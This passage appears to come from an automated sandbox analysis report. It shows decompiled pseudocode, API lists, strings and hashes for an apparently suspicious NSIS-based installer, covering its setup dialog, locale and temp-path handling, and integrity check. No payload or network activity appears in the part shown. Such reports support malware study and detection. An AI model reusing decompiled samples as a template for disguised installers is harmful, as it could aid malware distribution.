                                      						E00403CDD(_t125);
                                      						SetClassLongA(_t125, 0xfffffff2,  *0x42e348); // executed
                                      						 *0x42e32c = E0040140B(4);
                                      						_t35 = 1;
                                      						__eflags = 1;
                                      						 *0x429fbc = 1;
                                      					}
                                      					_t122 =  *0x40919c; // 0xffffffff
                                      					_t133 = 0;
                                      					_t130 = (_t122 << 6) +  *0x42eb80;
                                      					__eflags = _t122;
                                      					if(_t122 < 0) {
                                      						L34:
                                      						E00403D29(0x40b);
                                      						while(1) {
                                      							_t37 =  *0x429fbc;
                                      							 *0x40919c =  *0x40919c + _t37;
                                      							_t130 = _t130 + (_t37 << 6);
                                      							_t39 =  *0x40919c; // 0xffffffff
                                      							__eflags = _t39 -  *0x42eb84; // 0x2
                                      							if(__eflags == 0) {
                                      								E0040140B(1);
                                      							}
                                      							__eflags =  *0x42e32c - _t133; // 0x0
                                      							if(__eflags != 0) {
                                      								break;
                                      							}
                                      							_t44 =  *0x42eb84; // 0x2
                                      							__eflags =  *0x40919c - _t44; // 0xffffffff
                                      							if(__eflags >= 0) {
                                      								break;
                                      							}
                                      							_t116 =  *(_t130 + 0x14);
                                      							E0040594D(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
                                      							_push( *((intOrPtr*)(_t130 + 0x20)));
                                      							_push(0xfffffc19);
                                      							E00403CDD(_t125);
                                      							_push( *((intOrPtr*)(_t130 + 0x1c)));
                                      							_push(0xfffffc1b);
                                      							E00403CDD(_t125);
                                      							_push( *((intOrPtr*)(_t130 + 0x28)));
                                      							_push(0xfffffc1a);
                                      							E00403CDD(_t125);
                                      							_t49 = GetDlgItem(_t125, 3);
                                      							__eflags =  *0x42ebec - _t133; // 0x0
                                      							_v32 = _t49;
                                      							if(__eflags != 0) {
                                      								_t116 = _t116 & 0x0000fefd | 0x00000004;
                                      								__eflags = _t116;
                                      							}
                                      							ShowWindow(_t49, _t116 & 0x00000008);
                                      							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
                                      							E00403CFF(_t116 & 0x00000002);
                                      							_t117 = _t116 & 0x00000004;
                                      							EnableWindow( *0x428f98, _t117);
                                      							__eflags = _t117 - _t133;
                                      							if(_t117 == _t133) {
                                      								_push(1);
                                      							} else {
                                      								_push(_t133);
                                      							}
                                      							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
                                      							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
                                      							__eflags =  *0x42ebec - _t133; // 0x0
                                      							if(__eflags == 0) {
                                      								_push( *0x429fd0);
                                      							} else {
                                      								SendMessageA(_t125, 0x401, 2, _t133);
                                      								_push( *0x428f98);
                                      							}
                                      							E00403D12();
                                      							E0040592B(0x429fd8, "oryzytcrolozawnhxg Setup");
                                      							E0040594D(0x429fd8, _t125, _t130,  &(0x429fd8[lstrlenA(0x429fd8)]),  *((intOrPtr*)(_t130 + 0x18)));
                                      							SetWindowTextA(_t125, 0x429fd8);
                                      							_push(_t133);
                                      							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
                                      							__eflags = _t67;
                                      							if(_t67 != 0) {
                                      								continue;
                                      							} else {
                                      								__eflags =  *_t130 - _t133;
                                      								if( *_t130 == _t133) {
                                      									continue;
                                      								}
                                      								__eflags =  *(_t130 + 4) - 5;
                                      								if( *(_t130 + 4) != 5) {
                                      									DestroyWindow( *0x42e338);
                                      									 *0x4297a8 = _t130;
                                      									__eflags =  *_t130 - _t133;
                                      									if( *_t130 <= _t133) {
                                      										goto L58;
                                      									}
                                      									_t73 = CreateDialogParamA( *0x42eb60,  *_t130 +  *0x42e340 & 0x0000ffff, _t125,  *(0x4091a0 +  *(_t130 + 4) * 4), _t130);
                                      									__eflags = _t73 - _t133;
                                      									 *0x42e338 = _t73;
                                      									if(_t73 == _t133) {
                                      										goto L58;
                                      									}
                                      									_push( *((intOrPtr*)(_t130 + 0x2c)));
                                      									_push(6);
                                      									E00403CDD(_t73);
                                      									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
                                      									ScreenToClient(_t125, _t134 + 0x10);
                                      									SetWindowPos( *0x42e338, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
                                      									_push(_t133);
                                      									E00401389( *((intOrPtr*)(_t130 + 0xc)));
                                      									__eflags =  *0x42e32c - _t133; // 0x0
                                      									if(__eflags != 0) {
                                      										goto L61;
                                      									}
                                      									ShowWindow( *0x42e338, 8);
                                      									E00403D29(0x405);
                                      									goto L58;
                                      								}
                                      								__eflags =  *0x42ebec - _t133; // 0x0
                                      								if(__eflags != 0) {
                                      									goto L61;
                                      								}
                                      								__eflags =  *0x42ebe0 - _t133; // 0x0
                                      								if(__eflags != 0) {
                                      									continue;
                                      								}
                                      								goto L61;
                                      							}
                                      						}
                                      						DestroyWindow( *0x42e338);
                                      						 *0x42eb68 = _t133;
                                      						EndDialog(_t125,  *0x4293a0);
                                      						goto L58;
                                      					} else {
                                      						__eflags = _t35 - 1;
                                      						if(_t35 != 1) {
                                      							L33:
                                      							__eflags =  *_t130 - _t133;
                                      							if( *_t130 == _t133) {
                                      								goto L61;
                                      							}
                                      							goto L34;
                                      						}
                                      						_push(0);
                                      						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
                                      						__eflags = _t86;
                                      						if(_t86 == 0) {
                                      							goto L33;
                                      						}
                                      						SendMessageA( *0x42e338, 0x40f, 0, 1);
                                      						__eflags =  *0x42e32c - _t133; // 0x0
                                      						return 0 | __eflags == 0x00000000;
                                      					}
                                      				} else {
                                      					_t125 = _a4;
                                      					_t133 = 0;
                                      					if(_t115 == 0x47) {
                                      						SetWindowPos( *0x429fb0, _t125, 0, 0, 0, 0, 0x13);
                                      					}
                                      					if(_t115 == 5) {
                                      						asm("sbb eax, eax");
                                      						ShowWindow( *0x429fb0,  ~(_a12 - 1) & _t115);
                                      					}
                                      					if(_t115 != 0x40d) {
                                      						__eflags = _t115 - 0x11;
                                      						if(_t115 != 0x11) {
                                      							__eflags = _t115 - 0x111;
                                      							if(_t115 != 0x111) {
                                      								L26:
                                      								return E00403D44(_t115, _a12, _a16);
                                      							}
                                      							_t132 = _a12 & 0x0000ffff;
                                      							_t126 = GetDlgItem(_t125, _t132);
                                      							__eflags = _t126 - _t133;
                                      							if(_t126 == _t133) {
                                      								L13:
                                      								__eflags = _t132 - 1;
                                      								if(_t132 != 1) {
                                      									__eflags = _t132 - 3;
                                      									if(_t132 != 3) {
                                      										_t127 = 2;
                                      										__eflags = _t132 - _t127;
                                      										if(_t132 != _t127) {
                                      											L25:
                                      											SendMessageA( *0x42e338, 0x111, _a12, _a16);
                                      											goto L26;
                                      										}
                                      										__eflags =  *0x42ebec - _t133; // 0x0
                                      										if(__eflags == 0) {
                                      											_t99 = E0040140B(3);
                                      											__eflags = _t99;
                                      											if(_t99 != 0) {
                                      												goto L26;
                                      											}
                                      											 *0x4293a0 = 1;
                                      											L21:
                                      											_push(0x78);
                                      											L22:
                                      											E00403CB6();
                                      											goto L26;
                                      										}
                                      										E0040140B(_t127);
                                      										 *0x4293a0 = _t127;
                                      										goto L21;
                                      									}
                                      									__eflags =  *0x40919c - _t133; // 0xffffffff
                                      									if(__eflags <= 0) {
                                      										goto L25;
                                      									}
                                      									_push(0xffffffff);
                                      									goto L22;
                                      								}
                                      								_push(_t132);
                                      								goto L22;
                                      							}
                                      							SendMessageA(_t126, 0xf3, _t133, _t133);
                                      							_t103 = IsWindowEnabled(_t126);
                                      							__eflags = _t103;
                                      							if(_t103 == 0) {
                                      								goto L61;
                                      							}
                                      							goto L13;
                                      						}
                                      						SetWindowLongA(_t125, _t133, _t133);
                                      						return 1;
                                      					} else {
                                      						DestroyWindow( *0x42e338);
                                      						 *0x42e338 = _a12;
                                      						L58:
                                      						if( *0x42afd8 == _t133) {
                                      							_t142 =  *0x42e338 - _t133; // 0x0
                                      							if(_t142 != 0) {
                                      								ShowWindow(_t125, 0xa);
                                      								 *0x42afd8 = 1;
                                      							}
                                      						}
                                      						L61:
                                      						return 0;
                                      					}
                                      				}
                                      			}


                                      APIs
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403846
                                      • ShowWindow.USER32(?), ref: 00403863
                                      • DestroyWindow.USER32 ref: 00403877
                                      • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403893
                                      • GetDlgItem.USER32 ref: 004038B4
                                      • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 004038C8
                                      • IsWindowEnabled.USER32(00000000), ref: 004038CF
                                      • GetDlgItem.USER32 ref: 0040397D
                                      • GetDlgItem.USER32 ref: 00403987
                                      • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 004039A1
                                      • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 004039F2
                                      • GetDlgItem.USER32 ref: 00403A98
                                      • ShowWindow.USER32(00000000,?), ref: 00403AB9
                                      • EnableWindow.USER32(?,?), ref: 00403ACB
                                      • EnableWindow.USER32(?,?), ref: 00403AE6
                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403AFC
                                      • EnableMenuItem.USER32 ref: 00403B03
                                      • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403B1B
                                      • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403B2E
                                      • lstrlenA.KERNEL32(00429FD8,?,00429FD8,oryzytcrolozawnhxg Setup), ref: 00403B57
                                      • SetWindowTextA.USER32(?,00429FD8), ref: 00403B66
                                      • ShowWindow.USER32(?,0000000A), ref: 00403C9A
                                      Strings
                                      • oryzytcrolozawnhxg Setup, xrefs: 00403B48
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                                      • String ID: oryzytcrolozawnhxg Setup
                                      • API String ID: 4050669955-1991326464
                                      • Opcode ID: 43eaee0801e6aaf426ce723482984d0a7cd0caf67a9dfded40985b489c984417
                                      • Instruction ID: 5403acdcc1aa6bbc142bc1e7719ab292303190a86846970e4bd25be8090c7a94
                                      • Opcode Fuzzy Hash: 43eaee0801e6aaf426ce723482984d0a7cd0caf67a9dfded40985b489c984417
                                      • Instruction Fuzzy Hash: DCC1B471A08204ABEB21AF62ED85E2B7E6CFB45706F40043EF541B51E1C779A942DF1E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 96%
                                      			E00403489() {
                                      				intOrPtr _v4;
                                      				intOrPtr _v8;
                                      				int _v12;
                                      				int _v16;
                                      				char _v20;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				intOrPtr* _t20;
                                      				signed int _t24;
                                      				void* _t28;
                                      				void* _t30;
                                      				int _t31;
                                      				void* _t34;
                                      				struct HINSTANCE__* _t37;
                                      				int _t38;
                                      				intOrPtr _t39;
                                      				int _t42;
                                      				intOrPtr _t59;
                                      				char _t61;
                                      				CHAR* _t63;
                                      				signed char _t67;
                                      				struct HINSTANCE__* _t75;
                                      				CHAR* _t78;
                                      				intOrPtr _t80;
                                      				CHAR* _t85;
                                      
                                      				_t80 =  *0x42eb70; // 0x720250
                                      				_t20 = E00405C49(6);
                                      				_t87 = _t20;
                                      				if(_t20 == 0) {
                                      					_t78 = 0x429fd8;
                                      					"1033" = 0x7830;
                                      					E00405812(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x429fd8, 0);
                                      					__eflags =  *0x429fd8;
                                      					if(__eflags == 0) {
                                      						E00405812(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x429fd8, 0);
                                      					}
                                      					lstrcatA("1033", _t78);
                                      				} else {
                                      					E00405889("1033",  *_t20() & 0x0000ffff);
                                      				}
                                      				E0040373D(_t75, _t87);
                                      				_t24 =  *0x42eb78; // 0x80
                                      				_t84 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
                                      				 *0x42ebe0 = _t24 & 0x00000020;
                                      				if(E004054FF(_t87, "C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
                                      					L16:
                                      					if(E004054FF(_t95, _t84) == 0) {
                                      						E0040594D(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
                                      					}
                                      					_t28 = LoadImageA( *0x42eb60, 0x67, 1, 0, 0, 0x8040); // executed
                                      					 *0x42e348 = _t28;
                                      					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
                                      						L21:
                                      						if(E0040140B(0) == 0) {
                                      							_t30 = E0040373D(_t75, __eflags);
                                      							__eflags =  *0x42ec00; // 0x0
                                      							if(__eflags != 0) {
                                      								_t31 = E00404D9B(_t30, 0);
                                      								__eflags = _t31;
                                      								if(_t31 == 0) {
                                      									E0040140B(1);
                                      									goto L33;
                                      								}
                                      								__eflags =  *0x42e32c; // 0x0
                                      								if(__eflags == 0) {
                                      									E0040140B(2);
                                      								}
                                      								goto L22;
                                      							}
                                      							ShowWindow( *0x429fb0, 5); // executed
                                      							_t37 = LoadLibraryA("RichEd20"); // executed
                                      							__eflags = _t37;
                                      							if(_t37 == 0) {
                                      								LoadLibraryA("RichEd32");
                                      							}
                                      							_t85 = "RichEdit20A";
                                      							_t38 = GetClassInfoA(0, _t85, 0x42e300);
                                      							__eflags = _t38;
                                      							if(_t38 == 0) {
                                      								GetClassInfoA(0, "RichEdit", 0x42e300);
                                      								 *0x42e324 = _t85;
                                      								RegisterClassA(0x42e300);
                                      							}
                                      							_t39 =  *0x42e340; // 0x0
                                      							_t42 = DialogBoxParamA( *0x42eb60, _t39 + 0x00000069 & 0x0000ffff, 0, E0040380A, 0); // executed
                                      							E0040140B(5);
                                      							return _t42;
                                      						}
                                      						L22:
                                      						_t34 = 2;
                                      						return _t34;
                                      					} else {
                                      						_t75 =  *0x42eb60; // 0x400000
                                      						 *0x42e314 = _t28;
                                      						_v20 = 0x624e5f;
                                      						 *0x42e304 = E00401000;
                                      						 *0x42e310 = _t75;
                                      						 *0x42e324 =  &_v20;
                                      						if(RegisterClassA(0x42e300) == 0) {
                                      							L33:
                                      							__eflags = 0;
                                      							return 0;
                                      						}
                                      						_t12 =  &_v16; // 0x624e5f
                                      						SystemParametersInfoA(0x30, 0, _t12, 0);
                                      						 *0x429fb0 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42eb60, 0);
                                      						goto L21;
                                      					}
                                      				} else {
                                      					_t75 =  *(_t80 + 0x48);
                                      					if(_t75 == 0) {
                                      						goto L16;
                                      					}
                                      					_t59 =  *0x42eb98; // 0x725d88
                                      					_t78 = 0x42db00;
                                      					E00405812( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) + _t59, 0x42db00, 0);
                                      					_t61 =  *0x42db00; // 0x68
                                      					if(_t61 == 0) {
                                      						goto L16;
                                      					}
                                      					if(_t61 == 0x22) {
                                      						_t78 = 0x42db01;
                                      						 *((char*)(E00405449(0x42db01, 0x22))) = 0;
                                      					}
                                      					_t63 = lstrlenA(_t78) + _t78 - 4;
                                      					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
                                      						L15:
                                      						E0040592B(_t84, E0040541E(_t78));
                                      						goto L16;
                                      					} else {
                                      						_t67 = GetFileAttributesA(_t78);
                                      						if(_t67 == 0xffffffff) {
                                      							L14:
                                      							E00405465(_t78);
                                      							goto L15;
                                      						}
                                      						_t95 = _t67 & 0x00000010;
                                      						if((_t67 & 0x00000010) != 0) {
                                      							goto L15;
                                      						}
                                      						goto L14;
                                      					}
                                      				}
                                      			}


                                      APIs
                                        • Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                        • Part of subcall function 00405C49: LoadLibraryA.KERNELBASE(?,?,00000000,00403126,00000008), ref: 00405C66
                                        • Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                                      • lstrcatA.KERNEL32(1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000,00000006,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004034FA
                                      • lstrlenA.KERNEL32(hqliygqis,?,?,?,hqliygqis,00000000,C:\Users\user\AppData\Local\Temp,1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000,00000006,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ), ref: 00403565
                                      • lstrcmpiA.KERNEL32(?,.exe,hqliygqis,?,?,?,hqliygqis,00000000,C:\Users\user\AppData\Local\Temp,1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000), ref: 00403578
                                      • GetFileAttributesA.KERNEL32(hqliygqis), ref: 00403583
                                      • LoadImageA.USER32 ref: 004035CC
                                        • Part of subcall function 00405889: wsprintfA.USER32 ref: 00405896
                                      • RegisterClassA.USER32 ref: 00403613
                                      • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 0040362B
                                      • CreateWindowExA.USER32 ref: 00403664
                                      • ShowWindow.USER32(00000005,00000000), ref: 00403696
                                      • LoadLibraryA.KERNELBASE(RichEd20), ref: 004036A7
                                      • LoadLibraryA.KERNEL32(RichEd32), ref: 004036B2
                                      • GetClassInfoA.USER32 ref: 004036C2
                                      • GetClassInfoA.USER32 ref: 004036CF
                                      • RegisterClassA.USER32 ref: 004036D8
                                      • DialogBoxParamA.USER32 ref: 004036F7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                      • String ID: "C:\Users\user\Desktop\Y1p8VPvyU2.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$hqliygqis
                                      • API String ID: 914957316-2543560660
                                      • Opcode ID: ddebcaf873b3f80ffc25d6dfb232b9e28d9230a7995e8b1577ae424d02e99e0f
                                      • Instruction ID: 2e12796d13047950d683a8fbe5a4005f9ba98cb8c12c36bead37cfa09a1e5f4f
                                      • Opcode Fuzzy Hash: ddebcaf873b3f80ffc25d6dfb232b9e28d9230a7995e8b1577ae424d02e99e0f
                                      • Instruction Fuzzy Hash: 4C61C5B0644244BED620AF629D45E273AACEB4575AF44443FF941B22E2D73DAD018A3E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 80%
                                      			E00402C0B(void* __eflags, signed int _a4) {
                                      				DWORD* _v8;
                                      				DWORD* _v12;
                                      				void* _v16;
                                      				intOrPtr _v20;
                                      				long _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				signed int _v44;
                                      				long _t43;
                                      				signed int _t50;
                                      				void* _t53;
                                      				signed int _t54;
                                      				void* _t57;
                                      				intOrPtr* _t59;
                                      				long _t60;
                                      				signed int _t65;
                                      				signed int _t67;
                                      				signed int _t70;
                                      				signed int _t71;
                                      				signed int _t77;
                                      				intOrPtr _t80;
                                      				long _t82;
                                      				signed int _t85;
                                      				signed int _t87;
                                      				void* _t89;
                                      				signed int _t90;
                                      				signed int _t93;
                                      				void* _t94;
                                      
                                      				_t82 = 0;
                                      				_v12 = 0;
                                      				_v8 = 0;
                                      				_t43 = GetTickCount();
                                      				_t91 = "C:\\Users\\hardz\\Desktop\\Y1p8VPvyU2.exe";
                                      				 *0x42eb6c = _t43 + 0x3e8;
                                      				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\Y1p8VPvyU2.exe", 0x400);
                                      				_t89 = E00405602(_t91, 0x80000000, 3);
                                      				_v16 = _t89;
                                      				 *0x409010 = _t89;
                                      				if(_t89 == 0xffffffff) {
                                      					return "Error launching installer";
                                      				}
                                      				_t92 = "C:\\Users\\hardz\\Desktop";
                                      				E0040592B("C:\\Users\\hardz\\Desktop", _t91);
                                      				E0040592B(0x436000, E00405465(_t92));
                                      				_t50 = GetFileSize(_t89, 0);
                                      				__eflags = _t50;
                                      				 *0x428b88 = _t50;
                                      				_t93 = _t50;
                                      				if(_t50 <= 0) {
                                      					L24:
                                      					E00402BB0(1);
                                      					__eflags =  *0x42eb74 - _t82; // 0x8200
                                      					if(__eflags == 0) {
                                      						goto L29;
                                      					}
                                      					__eflags = _v8 - _t82;
                                      					if(_v8 == _t82) {
                                      						L28:
                                      						_t53 = GlobalAlloc(0x40, _v24); // executed
                                      						_t94 = _t53;
                                      						_t54 =  *0x42eb74; // 0x8200
                                      						E00403098(_t54 + 0x1c);
                                      						_push(_v24);
                                      						_push(_t94);
                                      						_push(_t82);
                                      						_push(0xffffffff);
                                      						_t57 = E00402E44();
                                      						__eflags = _t57 - _v24;
                                      						if(_t57 == _v24) {
                                      							__eflags = _v44 & 0x00000001;
                                      							 *0x42eb70 = _t94;
                                      							 *0x42eb78 =  *_t94;
                                      							if((_v44 & 0x00000001) != 0) {
                                      								 *0x42eb7c =  *0x42eb7c + 1;
                                      								__eflags =  *0x42eb7c;
                                      							}
                                      							_t40 = _t94 + 0x44; // 0x44
                                      							_t59 = _t40;
                                      							_t85 = 8;
                                      							do {
                                      								_t59 = _t59 - 8;
                                      								 *_t59 =  *_t59 + _t94;
                                      								_t85 = _t85 - 1;
                                      								__eflags = _t85;
                                      							} while (_t85 != 0);
                                      							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                      							 *(_t94 + 0x3c) = _t60;
                                      							E004055C3(0x42eb80, _t94 + 4, 0x40);
                                      							__eflags = 0;
                                      							return 0;
                                      						}
                                      						goto L29;
                                      					}
                                      					E00403098( *0x414b78);
                                      					_t65 = E00403066( &_a4, 4); // executed
                                      					__eflags = _t65;
                                      					if(_t65 == 0) {
                                      						goto L29;
                                      					}
                                      					__eflags = _v12 - _a4;
                                      					if(_v12 != _a4) {
                                      						goto L29;
                                      					}
                                      					goto L28;
                                      				} else {
                                      					do {
                                      						_t67 =  *0x42eb74; // 0x8200
                                      						_t90 = _t93;
                                      						asm("sbb eax, eax");
                                      						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
                                      						__eflags = _t93 - _t70;
                                      						if(_t93 >= _t70) {
                                      							_t90 = _t70;
                                      						}
                                      						_t71 = E00403066(0x420b88, _t90); // executed
                                      						__eflags = _t71;
                                      						if(_t71 == 0) {
                                      							E00402BB0(1);
                                      							L29:
                                      							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                      						}
                                      						__eflags =  *0x42eb74;
                                      						if( *0x42eb74 != 0) {
                                      							__eflags = _a4 & 0x00000002;
                                      							if((_a4 & 0x00000002) == 0) {
                                      								E00402BB0(0);
                                      							}
                                      							goto L20;
                                      						}
                                      						E004055C3( &_v44, 0x420b88, 0x1c);
                                      						_t77 = _v44;
                                      						__eflags = _t77 & 0xfffffff0;
                                      						if((_t77 & 0xfffffff0) != 0) {
                                      							goto L20;
                                      						}
                                      						__eflags = _v40 - 0xdeadbeef;
                                      						if(_v40 != 0xdeadbeef) {
                                      							goto L20;
                                      						}
                                      						__eflags = _v28 - 0x74736e49;
                                      						if(_v28 != 0x74736e49) {
                                      							goto L20;
                                      						}
                                      						__eflags = _v32 - 0x74666f73;
                                      						if(_v32 != 0x74666f73) {
                                      							goto L20;
                                      						}
                                      						__eflags = _v36 - 0x6c6c754e;
                                      						if(_v36 != 0x6c6c754e) {
                                      							goto L20;
                                      						}
                                      						_a4 = _a4 | _t77;
                                      						_t87 =  *0x414b78; // 0x4dbff
                                      						 *0x42ec00 =  *0x42ec00 | _a4 & 0x00000002;
                                      						_t80 = _v20;
                                      						__eflags = _t80 - _t93;
                                      						 *0x42eb74 = _t87;
                                      						if(_t80 > _t93) {
                                      							goto L29;
                                      						}
                                      						__eflags = _a4 & 0x00000008;
                                      						if((_a4 & 0x00000008) != 0) {
                                      							L16:
                                      							_v8 = _v8 + 1;
                                      							_t24 = _t80 - 4; // 0x409154
                                      							_t93 = _t24;
                                      							__eflags = _t90 - _t93;
                                      							if(_t90 > _t93) {
                                      								_t90 = _t93;
                                      							}
                                      							goto L20;
                                      						}
                                      						__eflags = _a4 & 0x00000004;
                                      						if((_a4 & 0x00000004) != 0) {
                                      							break;
                                      						}
                                      						goto L16;
                                      						L20:
                                      						__eflags = _t93 -  *0x428b88; // 0x4dc03
                                      						if(__eflags < 0) {
                                      							_v12 = E00405CB5(_v12, 0x420b88, _t90);
                                      						}
                                      						 *0x414b78 =  *0x414b78 + _t90;
                                      						_t93 = _t93 - _t90;
                                      						__eflags = _t93;
                                      					} while (_t93 > 0);
                                      					_t82 = 0;
                                      					__eflags = 0;
                                      					goto L24;
                                      				}
                                      			}


































                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00402C1C
                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Y1p8VPvyU2.exe,00000400), ref: 00402C38
                                        • Part of subcall function 00405602: GetFileAttributesA.KERNELBASE(00000003,00402C4B,C:\Users\user\Desktop\Y1p8VPvyU2.exe,80000000,00000003), ref: 00405606
                                        • Part of subcall function 00405602: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405628
                                      • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Y1p8VPvyU2.exe,C:\Users\user\Desktop\Y1p8VPvyU2.exe,80000000,00000003), ref: 00402C84
                                      Strings
                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402DE3
                                      • Inst, xrefs: 00402CF0
                                      • "C:\Users\user\Desktop\Y1p8VPvyU2.exe" , xrefs: 00402C15
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C0B
                                      • C:\Users\user\Desktop, xrefs: 00402C66, 00402C6B, 00402C71
                                      • C:\Users\user\Desktop\Y1p8VPvyU2.exe, xrefs: 00402C22, 00402C31, 00402C45, 00402C65
                                      • Error launching installer, xrefs: 00402C5B
                                      • Null, xrefs: 00402D02
                                      • soft, xrefs: 00402CF9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                      • String ID: "C:\Users\user\Desktop\Y1p8VPvyU2.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Y1p8VPvyU2.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                      • API String ID: 4283519449-2207404279
                                      • Opcode ID: 0c7fdcf59c0fb2b92b8374371fd2f99e1dcbb6099d677134b975e3fd63279e42
                                      • Instruction ID: 825a226a8dc595578503c7203fc5804032ed62a4dd83b14a28db2b62ef09ea34
                                      • Opcode Fuzzy Hash: 0c7fdcf59c0fb2b92b8374371fd2f99e1dcbb6099d677134b975e3fd63279e42
                                      • Instruction Fuzzy Hash: 0651D371900214ABDF20AF75DE89BAE7BA8EF04319F10457BF500B22D1C7B89D418B9D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 60%
                                      			E00401734(FILETIME* __ebx, void* __eflags) {
                                      				void* _t33;
                                      				void* _t41;
                                      				void* _t43;
                                      				FILETIME* _t49;
                                      				FILETIME* _t62;
                                      				void* _t64;
